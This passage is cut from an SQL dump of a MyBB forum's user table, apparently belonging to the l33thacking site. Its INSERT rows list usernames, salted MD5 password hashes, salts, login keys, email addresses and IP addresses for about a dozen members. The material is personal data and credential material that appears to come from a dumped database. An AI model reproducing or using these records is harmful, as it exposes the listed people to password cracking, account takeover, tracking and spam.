`subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('3', '??????????¢™', 'd667fd2b62f764ae14deaa3df983f5eb', 'RHWvVnPS', 'CLzyhFeO7aadSlH7kDVLv5h4s9Vr4MtH5ucdp4pVxEPumEdUDq', 'solid9deep@yahoo.com', '195', './uploads/avatars/avatar_3.png?dateline=1348980965', '120|33', 'upload', '3', '', '0', 'Having Trouble? PM me', '1339904641', '1351314831', '1351313317', '1351313219', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/ZWG4J.gif[/img][/align]', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-7', '0', '2', '', '', '0', '1', '1350705509', '31-12-9999', 'Forgot my way home!', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '9', '75.22.48.94', '75.22.48.43', '1259745374', '1259745323', '', '148973', '1', '49', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:4:{i:21;a:5:{s:4:\"acid\";i:21;s:4:\"name\";s:9:\"Music Fan\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:2:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '18', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('4', 'Triple H', '012da23e98627651b9782092d1992efe', '6lbjzxCj', '9ViKD6KLUewO6tDxsw2i5rLCD4JWpLJdgM4lSdTbTyYCeG4Hxr', 'test@l33thacking.com', '130', 'images/avatars/supertux.gif?dateline=1340078339', '120|102', 'gallery', '2', '', '0', '', '1339994612', '1352790493', '1352776086', '1352597811', '', '0', '', '', '', '', 'all', 'I love L33THacking.com!', '1', '0', '0', '0', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '1', '', '173.245.62.14', '0', '-1376436722', '', '40585', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:1:{i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '31', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('5', 'Timmy', 'cd1f8e823c59e72f9da6f2b338541411', 'eILkwX4k', 'mkq25YxVnnCuRMdqvkjR4TRXXLwB6xPaDe3pX2AByKw2PILYeO', 'something@bindas.com', '287', 'images/avatars/LH Misc./Yomoma.gif?dateline=1346643810', '64|64', 'gallery', '9', '13', '0', '', '1340516797', '1352533983', '1352531645', '1352530926', '', '0', '', '', '', '', 'all', '[url=http://l33thacking.net/user-5.html][align=center][img]http://l33thacking.net/images/CoderGreen/logocg.png[/img][/align][/url]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '0', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '5', '', '72.231.24.165', '0', '1223104677', '', '73825', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', '', 'a:3:{s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:2:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:24;a:5:{s:4:\"acid\";i:24;s:4:\"name\";s:7:\"YouTube\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_1_44_00.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}}', '55', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('6', 'xlesnyx12', '2c3f88a56ae550bb51bfa94ca3c16cf9', 'hqDYPNeF', 'cQ8m9FUNRed315hsahAvqjEDYfkAMPcE79T5Et1MbWirhThHIA', 'xlesnyx12@o2.pl', '15', '', '', '', '2', '', '0', '', '1341496105', '1342302892', '1341496717', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '77.253.195.126', '41.174.8.40', '1308476286', '699271208', '', '867', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '15', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('9', 'p420', 'bbeab4ba9da453ca4d0c6a40b1cd4d79', 'ndtLvfZu', 'QASdmfpZDyXlfkGCISosAIpLoJJgnezi4npwysNqTu1EGzNiks', 'patonll93@gmail.com', '106', 'http://l33thavatars.netne.net/money/?dateline=1350433298', '48|48', 'remote', '2', '13', '13', '', '1341695346', '1352526844', '1352391986', '1352526819', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '4', '46.7.37.171', '72.231.24.165', '772220331', '1223104677', '', '24312', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:1:{i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('7', 'Romdu62', '20d6223c4b0195876f67cecdb59b9a0c', 'WuFYXrVN', '59BSqfZbrm9GJxhxMHSHGIDHk14mnQw6W7kX5ATQwNN6MG6R7x', 'straiqz@gmail.com', '91', '', '', '', '2', '', '0', '', '1341660267', '1352536198', '1352350356', '1352536047', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '90.58.254.83', '72.231.24.165', '1513815635', '1223104677', '', '16873', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('8', 'spacefish36', '2718275dbeb85365b53d80e7764854b5', 'LA5gxSdg', 'gPU4B6tUTZ1aYwyfUSomJOG8Kz3VzMmyKfVeFlF4e9XGjVkL3v', 'spacefish35@yahoo.com', '71', '', '', '', '2', '', '0', '', '1341665208', '1352527919', '1352525516', '1352527686', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '108.235.74.2', '72.231.24.165', '1827359234', '1223104677', 'english', '15659', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '15', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('11', 'Reminiscing ?', '5408a5bd33c5aa235698f8d21138dd9b', '6o1vpzDy', '7rB9Lo5he4gft1KW3dcEyM5PNQOjg47Zu64gcNhTXoLmDkHWwG', 'andre@exiledforums.co.uk', '6', './uploads/avatars/avatar_11.jpg?dateline=1342041947', '120|150', 'upload', '2', '', '0', '', '1342041124', '1342431612', '1342388923', '1342211111', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '92.25.20.80', '78.146.232.150', '1545147472', '1318250646', '', '5984', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('10', 'swa4567', '8ab7eb1e5c564a689219240150aaadff', 'Ul54AhOn', 'zhCvm4OT4DigEQZaIcwmYfLZNUqDArLfC6q2BeBkh8r4m8pznS', 'sewarrington@aol.com', '33', '', '', '', '2', '', '0', '', '1341932547', '1350860448', '1349923842', '1349923699', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.186.29.81', '72.231.24.165', '1455037777', '1223104677', '', '7817', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '7', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('12', 'jonas83', '8c3c17a84c959653216ba2fab3151933', '8G18qRhq', 'Z73yJgEXebDjF1ycihQV82XquQTmNLXRo3p462upTmzvsHNqH3', 'jonas83felix@gmail.com', '14', 'images/avatars/LH Misc./f5.gif?dateline=1349473857', '100|100', 'gallery', '2', '', '0', '', '1342124118', '1349475148', '1345144436', '1349475145', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '1', '0', '99.251.136.11', '72.231.24.165', '1677428747', '1223104677', '', '3462', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '5', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('13', 'unixmoon', '496d72e478374bd9c362211196219c34', 'luyGQd12', 'w6GP7R6U6AJwGEBVkfnxU7YDcbhjUqOrSjckkkwOdxEroV5SDy', 'unixmoon@yahoo.com', '10', '', '', '', '2', '', '0', '', '1342145323', '1346971734', '1345419500', '1346971723', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '146.171.254.97', '72.229.164.105', '-1834221983', '1223009385', '', '2743', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '4', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('17', 'khade009', '343663a264e9b84c388e65b83a61a84f', 'kdBZOtoR', 'p32Mrmp4q7N9ALNfy8uKw7d4MTKqqc4T4Uk4vpICN32XqQdxXa', 'khade009@gmail.com', '7', '', '', '', '2', '', '0', '', '1342352787', '1346902774', '1346789058', '1346789028', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '124.155.241.141', '72.229.164.105', '2090594701', '1223009385', '', '857', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '3', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, 